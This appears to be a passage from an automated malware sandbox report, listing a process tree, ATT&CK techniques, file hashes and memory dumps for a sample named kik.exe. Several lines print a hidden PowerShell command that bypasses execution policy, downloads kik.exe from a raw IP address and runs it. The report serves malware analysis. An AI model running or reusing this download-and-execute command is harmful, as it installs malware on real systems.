    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1504
  - - C:\Users\Admin\AppData\Roaming\kik.exe
      "C:\Users\Admin\AppData\Roaming\kik.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1824
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1504 -s 1480
      4⤵
      Loads dropped DLL
      Program crash
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of AdjustPrivilegeToken
      PID:620
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://162.245.190.59/hit/kik.exe','C:\Users\Admin\AppData\Roaming\kik.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\kik.exe'"
  2⤵
  - Process spawned unexpected child process
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1912
- - C:\Users\Admin\AppData\Roaming\kik.exe
    "C:\Users\Admin\AppData\Roaming\kik.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1984
  - - C:\Users\Admin\AppData\Roaming\kik.exe
      "C:\Users\Admin\AppData\Roaming\kik.exe"
      4⤵
      Executes dropped EXE
      PID:560
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 1476
      4⤵
      Loads dropped DLL
      Program crash
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of AdjustPrivilegeToken
      PID:576
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://162.245.190.59/hit/kik.exe','C:\Users\Admin\AppData\Roaming\kik.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\kik.exe'"
  2⤵
  - Process spawned unexpected child process
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1896
- - C:\Users\Admin\AppData\Roaming\kik.exe
    "C:\Users\Admin\AppData\Roaming\kik.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:808
  - - C:\Users\Admin\AppData\Roaming\kik.exe
      "C:\Users\Admin\AppData\Roaming\kik.exe"
      4⤵
      Executes dropped EXE
      PID:1836
  - - C:\Users\Admin\AppData\Roaming\kik.exe
      "C:\Users\Admin\AppData\Roaming\kik.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:1220
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1972

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5
25af219a70aa90f578206f1799eebfb7

SHA1
fc29c99a8d701e285821e9db549657409112aa03

SHA256
57dfbeee95c9b6c41d9eb959106a250d084565d956004e230d2778f8d9fe5b0c

SHA512
74ec5e0ec9764644454b44acaff48bf9784e41b7f58e2f44e3986afe5a0e928369f2822fdbbc768a9e49d7445d61fb6b5066980dcd685adc22c7af6cf16713ad

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5
25af219a70aa90f578206f1799eebfb7

SHA1
fc29c99a8d701e285821e9db549657409112aa03

SHA256
57dfbeee95c9b6c41d9eb959106a250d084565d956004e230d2778f8d9fe5b0c

SHA512
74ec5e0ec9764644454b44acaff48bf9784e41b7f58e2f44e3986afe5a0e928369f2822fdbbc768a9e49d7445d61fb6b5066980dcd685adc22c7af6cf16713ad

Download Submit
C:\Users\Admin\AppData\Roaming\kik.exe

MD5
a9dc973cb1d6029961397a76b560444c

SHA1
41d30f2f6c84722ec1ea68fc09b943604de85d05

SHA256
c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

SHA512
ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

Download Submit
C:\Users\Admin\AppData\Roaming\kik.exe

MD5
a9dc973cb1d6029961397a76b560444c

SHA1
41d30f2f6c84722ec1ea68fc09b943604de85d05

SHA256
c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

SHA512
ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

Download Submit
C:\Users\Admin\AppData\Roaming\kik.exe

MD5
a9dc973cb1d6029961397a76b560444c

SHA1
41d30f2f6c84722ec1ea68fc09b943604de85d05

SHA256
c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

SHA512
ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

Download Submit
C:\Users\Admin\AppData\Roaming\kik.exe

MD5
a9dc973cb1d6029961397a76b560444c

SHA1
41d30f2f6c84722ec1ea68fc09b943604de85d05

SHA256
c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

SHA512
ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

Download Submit
C:\Users\Admin\AppData\Roaming\kik.exe

MD5
a9dc973cb1d6029961397a76b560444c

SHA1
41d30f2f6c84722ec1ea68fc09b943604de85d05

SHA256
c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

SHA512
ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

Download Submit
C:\Users\Admin\AppData\Roaming\kik.exe

MD5
a9dc973cb1d6029961397a76b560444c

SHA1
41d30f2f6c84722ec1ea68fc09b943604de85d05

SHA256
c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

SHA512
ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

Download Submit
C:\Users\Admin\AppData\Roaming\kik.exe

MD5
a9dc973cb1d6029961397a76b560444c

SHA1
41d30f2f6c84722ec1ea68fc09b943604de85d05

SHA256
c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

SHA512
ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

Download Submit
C:\Users\Admin\AppData\Roaming\kik.exe

MD5
a9dc973cb1d6029961397a76b560444c

SHA1
41d30f2f6c84722ec1ea68fc09b943604de85d05

SHA256
c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

SHA512
ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Roaming\kik.exe

MD5
a9dc973cb1d6029961397a76b560444c

SHA1
41d30f2f6c84722ec1ea68fc09b943604de85d05

SHA256
c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

SHA512
ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

Download Submit
\Users\Admin\AppData\Roaming\kik.exe

MD5
a9dc973cb1d6029961397a76b560444c

SHA1
41d30f2f6c84722ec1ea68fc09b943604de85d05

SHA256
c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

SHA512
ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

Download Submit
\Users\Admin\AppData\Roaming\kik.exe

MD5
a9dc973cb1d6029961397a76b560444c

SHA1
41d30f2f6c84722ec1ea68fc09b943604de85d05

SHA256
c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

SHA512
ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

Download Submit
\Users\Admin\AppData\Roaming\kik.exe

MD5
a9dc973cb1d6029961397a76b560444c

SHA1
41d30f2f6c84722ec1ea68fc09b943604de85d05

SHA256
c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

SHA512
ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

Download Submit
\Users\Admin\AppData\Roaming\kik.exe

MD5
a9dc973cb1d6029961397a76b560444c

SHA1
41d30f2f6c84722ec1ea68fc09b943604de85d05

SHA256
c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

SHA512
ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

Download Submit
\Users\Admin\AppData\Roaming\kik.exe

MD5
a9dc973cb1d6029961397a76b560444c

SHA1
41d30f2f6c84722ec1ea68fc09b943604de85d05

SHA256
c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

SHA512
ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

Download Submit
\Users\Admin\AppData\Roaming\kik.exe

MD5
a9dc973cb1d6029961397a76b560444c

SHA1
41d30f2f6c84722ec1ea68fc09b943604de85d05

SHA256
c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

SHA512
ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

Download Submit
\Users\Admin\AppData\Roaming\kik.exe

MD5
a9dc973cb1d6029961397a76b560444c

SHA1
41d30f2f6c84722ec1ea68fc09b943604de85d05

SHA256
c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

SHA512
ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

Download Submit
\Users\Admin\AppData\Roaming\kik.exe

MD5
a9dc973cb1d6029961397a76b560444c

SHA1
41d30f2f6c84722ec1ea68fc09b943604de85d05

SHA256
c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

SHA512
ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

Download Submit
\Users\Admin\AppData\Roaming\kik.exe

MD5
a9dc973cb1d6029961397a76b560444c

SHA1
41d30f2f6c84722ec1ea68fc09b943604de85d05

SHA256
c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

SHA512
ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

Download Submit
\Users\Admin\AppData\Roaming\kik.exe

MD5
a9dc973cb1d6029961397a76b560444c

SHA1
41d30f2f6c84722ec1ea68fc09b943604de85d05

SHA256
c65afe6aab8cfee0ba3538f2cca2e5370ec563248e8d421869e50c48becd4d73

SHA512
ecae8bdc651c431b3a741166fa353d546d408144567ddd5997227104ecbf06e25bb0ce8e5b06e4dcbe02ce90f0df9b877843c9377c705e746bdd0c46c5afc5ce

Download Submit
memory/372-61-0x0000000001CF2000-0x0000000001CF4000-memory.dmp

Filesize
8KB

Download
memory/372-60-0x0000000001CF1000-0x0000000001CF2000-memory.dmp

Filesize
4KB

Download
memory/372-59-0x0000000001CF0000-0x0000000001CF1000-memory.dmp

Filesize
4KB

Download
memory/372-57-0x0000000000000000-mapping.dmp

Download
memory/560-114-0x000000000043774E-mapping.dmp

Download
memory/576-118-0x0000000000000000-mapping.dmp

Download
memory/576-130-0x0000000000800000-0x0000000000860000-memory.dmp

Filesize
384KB

Download
memory/620-75-0x0000000000000000-mapping.dmp

Download
memory/620-83-0x0000000000380000-0x0000000000381000-memory.dmp

Filesize
4KB

Download
memory/808-110-0x0000000004C50000-0x0000000004C51000-memory.dmp

Filesize
4KB

Download
memory/808-102-0x0000000000000000-mapping.dmp

Download
memory/1220-133-0x00000000006C1000-0x00000000006C2000-memory.dmp

Filesize
4KB

Download
memory/1220-129-0x00000000006C0000-0x00000000006C1000-memory.dmp

Filesize
4KB

Download
memory/1220-120-0x000000000043774E-mapping.dmp

Download
memory/1504-63-0x0000000000000000-mapping.dmp

Download
memory/1504-66-0x0000000000830000-0x0000000000831000-memory.dmp

Filesize
4KB

Download
memory/1504-68-0x0000000004970000-0x0000000004971000-memory.dmp

Filesize
4KB

Download
memory/1504-69-0x00000000044A0000-0x00000000044EE000-memory.dmp

Filesize
312KB

Download
memory/1620-53-0x0000000072E41000-0x0000000072E44000-memory.dmp

Filesize
12KB

Download
memory/1620-54-0x00000000708C1000-0x00000000708C3000-memory.dmp

Filesize
8KB

Download
memory/1620-55-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1620-56-0x0000000076B61000-0x0000000076B63000-memory.dmp

Filesize
8KB

Download
memory/1824-82-0x00000000048A0000-0x00000000048A1000-memory.dmp

Filesize
4KB

Download
memory/1824-71-0x000000000043774E-mapping.dmp

Download
memory/1824-70-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/1824-73-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/1896-98-0x0000000004E30000-0x0000000005102000-memory.dmp

Filesize
2.8MB

Download
memory/1896-96-0x00000000023E0000-0x000000000302A000-memory.dmp

Filesize
12.3MB

Download
memory/1896-92-0x00000000023E0000-0x000000000302A000-memory.dmp

Filesize
12.3MB

Download
memory/1896-85-0x0000000000000000-mapping.dmp

Download
memory/1896-94-0x00000000023E0000-0x000000000302A000-memory.dmp

Filesize
12.3MB

Download
memory/1912-93-0x00000000023F1000-0x00000000023F2000-memory.dmp

Filesize
4KB

Download
memory/1912-97-0x0000000004D60000-0x0000000005032000-memory.dmp

Filesize
2.8MB

Download
memory/1912-95-0x00000000023F2000-0x00000000023F4000-memory.dmp

Filesize
8KB

Download
memory/1912-91-0x00000000023F0000-0x00000000023F1000-memory.dmp

Filesize
4KB

Download
memory/1912-84-0x0000000000000000-mapping.dmp

Download
memory/1972-131-0x0000000000000000-mapping.dmp

Download
memory/1972-132-0x000007FEFC4F1000-0x000007FEFC4F3000-memory.dmp

Filesize
8KB

Download
memory/1984-109-0x0000000000760000-0x0000000000761000-memory.dmp

Filesize
4KB

Download
memory/1984-99-0x0000000000000000-mapping.dmp

Download